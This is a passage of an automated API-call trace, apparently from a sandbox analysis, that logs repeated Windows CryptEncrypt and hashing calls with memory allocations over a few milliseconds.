CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.821] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.822] malloc (_Size=0x1fd) returned 0x3df0420 [0142.822] free (_Block=0x0) [0142.822] free (_Block=0x3def558) [0142.822] malloc (_Size=0x1fd) returned 0x3def558 [0142.822] free (_Block=0x0) [0142.822] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.822] CryptHashData (hHash=0x432db8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.822] malloc (_Size=0x14) returned 0x3f653c0 [0142.822] free (_Block=0x0) [0142.822] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x37dfacc) returned 1 [0142.822] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.823] free (_Block=0x3f653c0) [0142.823] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.823] free (_Block=0x3def558) [0142.823] free (_Block=0x3def350) [0142.823] malloc (_Size=0x1fd) returned 0x3def350 [0142.823] free (_Block=0x0) [0142.823] malloc (_Size=0x1f2) returned 0x3def558 [0142.823] free (_Block=0x0) [0142.823] malloc (_Size=0x1f2) returned 0x60cdc0 [0142.823] free (_Block=0x0) [0142.823] free (_Block=0x0) [0142.823] free (_Block=0x3def558) [0142.823] free (_Block=0x60cdc0) [0142.823] free (_Block=0x3def350) [0142.823] free (_Block=0x3df0420) [0142.823] malloc (_Size=0x1fd) returned 0x3df0420 [0142.823] free (_Block=0x0) [0142.823] malloc (_Size=0x1fd) returned 0x3def350 [0142.823] free (_Block=0x0) [0142.824] free (_Block=0x0) [0142.824] free (_Block=0x3df0420) [0142.824] malloc (_Size=0x1fd) returned 0x3df0420 [0142.824] free (_Block=0x0) [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.824] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.825] malloc (_Size=0x1fd) returned 0x3def558 [0142.825] free (_Block=0x0) [0142.825] free (_Block=0x3def350) [0142.826] free (_Block=0x3df0420) [0142.826] malloc (_Size=0x1fd) returned 0x3def350 [0142.826] free (_Block=0x0) [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.826] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3d81efc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.827] malloc (_Size=0x1fd) returned 0x3df0420 [0142.827] free (_Block=0x0) [0142.827] free (_Block=0x3def558) [0142.827] malloc (_Size=0x1fd) returned 0x3def558 [0142.827] free (_Block=0x0) [0142.827] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0142.827] CryptHashData (hHash=0x432db8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.828] malloc (_Size=0x14) returned 0x3f65460 [0142.828] free (_Block=0x0) [0142.828] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x37dfacc) returned 1 [0142.828] CryptHashData (hHash=0x432eb8, pbData=0x3def558, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.828] free (_Block=0x3f65460) [0142.828] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.828] free (_Block=0x3def558) [0142.828] free (_Block=0x3def350) [0142.828] malloc (_Size=0x1fd) returned 0x3def350 [0142.828] free (_Block=0x0) [0142.828] malloc (_Size=0x1f2) returned 0x3def558 [0142.828] free (_Block=0x0) [0142.828] malloc (_Size=0x1f2) returned 0x60cdc0 [0142.828] free (_Block=0x0) [0142.828] free (_Block=0x0) [0142.828] free (_Block=0x3def558) [0142.828] free (_Block=0x60cdc0) [0142.828] free (_Block=0x3def350) [0142.828] free (_Block=0x3df0420) [0142.828] malloc (_Size=0x1fd) returned 0x3df0420 [0142.829] free (_Block=0x0) [0142.829] malloc (_Size=0x1fd) returned 0x3def350 [0142.829] free (_Block=0x0) [0142.829] free (_Block=0x0) [0142.829] free (_Block=0x3df0420) [0142.829] malloc (_Size=0x1fd) returned 0x3df0420 [0142.829] free (_Block=0x0) [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0142.829] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, 